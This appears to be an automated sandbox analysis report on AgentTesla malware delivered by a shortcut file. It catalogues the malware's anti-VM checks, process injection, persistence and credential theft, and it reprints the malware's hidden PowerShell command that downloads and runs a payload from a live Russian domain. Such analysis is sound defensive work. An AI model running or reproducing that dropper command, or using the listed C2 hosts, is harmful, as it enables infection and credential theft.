                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98889Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98751Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98387Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: RegSvcs.exe, 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000008.00000002.2577560284.0000000006581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
                    Source: wscript.exe, 0000000A.00000003.2494459581.0000017DBF6C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: powershell.exe, 00000000.00000002.2297021387.000002213FA30000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3381286822.0000000005C16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016780A8 CheckRemoteDebuggerPresent,8_2_016780A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10BA008Jump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8A5008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "& { invoke-webrequest -uri https://oootorgline.ru/components/grace.exe -outfile c:\users\user\appdata\local\temp\file.exe; start-process 'c:\users\user\appdata\local\temp\file.exe' }"
                    Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: program manager
                    Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: program managerTH
                    Source: file.exe, 00000003.00000000.2259095278.0000000000482000.00000002.00000001.01000000.00000007.sdmp, recomplaint.exe, 00000007.00000000.2334344307.0000000000482000.00000002.00000001.01000000.00000008.sdmp, recomplaint.exe, 0000000B.00000000.2494140304.0000000000482000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2567429663.0000000003446000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5768, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5768, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2567429663.0000000003446000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5768, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts221
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		212
                    Process Injection                    		1
                    Obfuscated Files or Information                    		11
                    Input Capture                    		124
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    PowerShell                    		21
                    Registry Run Keys / Startup Folder                    		21
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		1
                    Credentials in Registry                    		621
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Masquerading                    		NTDS12
                    Process Discovery                    		Distributed Component Object Model11
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script251
                    Virtualization/Sandbox Evasion                    		LSA Secrets251
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts212
                    Process Injection                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Hidden Files and Directories                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520403 Sample: RTGS-WB-ABS-240730-NEW.lnk Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 52 techniqueqatar.com 2->52 54 oootorgline.ru 2->54 56 3 other IPs or domains 2->56 84 Suricata IDS alerts for network traffic 2->84 86 Found malware configuration 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 12 other signatures 2->90 9 powershell.exe 14 20 2->9         started        14 wscript.exe 1 2->14         started        16 aWUFv.exe 2 2->16         started        18 aWUFv.exe 1 2->18         started        signatures3 process4 dnsIp5 66 oootorgline.ru 176.99.3.36, 443, 61245 AS-REGRU Russian Federation 9->66 50 C:\Users\user\AppData\Local\Temp\file.exe, PE32 9->50 dropped 106 Powershell drops PE file 9->106 20 file.exe 3 9->20         started        24 conhost.exe 1 9->24         started        108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->108 26 recomplaint.exe 14->26         started        28 conhost.exe 16->28         started        30 conhost.exe 18->30         started        file6 signatures7 process8 file9 46 C:\Users\user\AppData\...\recomplaint.exe, PE32 20->46 dropped 92 Machine Learning detection for dropped file 20->92 32 recomplaint.exe 1 20->32         started        94 Writes to foreign memory regions 26->94 96 Maps a DLL or memory area into another process 26->96 36 RegSvcs.exe 3 26->36         started        signatures10 process11 dnsIp12 44 C:\Users\user\AppData\...\recomplaint.vbs, data 32->44 dropped 68 Machine Learning detection for dropped file 32->68 70 Drops VBS files to the startup folder 32->70 72 Writes to foreign memory regions 32->72 80 2 other signatures 32->80 39 RegSvcs.exe 16 4 32->39         started        58 104.26.13.205, 443, 60910 CLOUDFLARENETUS United States 36->58 74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 36->74 76 Tries to steal Mail credentials (via file / registry access) 36->76 78 Tries to harvest and steal ftp login credentials 36->78 82 3 other signatures 36->82 file13 signatures14 process15 dnsIp16 60 ip-api.com 208.95.112.1, 60911, 61254, 80 TUT-ASUS United States 39->60 62 techniqueqatar.com 208.91.198.176, 587, 60905, 60912 PUBLIC-DOMAIN-REGISTRYUS United States 39->62 64 api.ipify.org 172.67.74.152, 443, 61253 CLOUDFLARENETUS United States 39->64 48 C:\Users\user\AppData\Roaming\...\aWUFv.exe, PE32 39->48 dropped 98 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->98 100 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 39->100 102 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 39->102 104 5 other signatures 39->104 file17 signatures18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    RTGS-WB-ABS-240730-NEW.lnk24%ReversingLabsScript-BAT.Trojan.Heuristic

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\file.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\unspattered\recomplaint.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
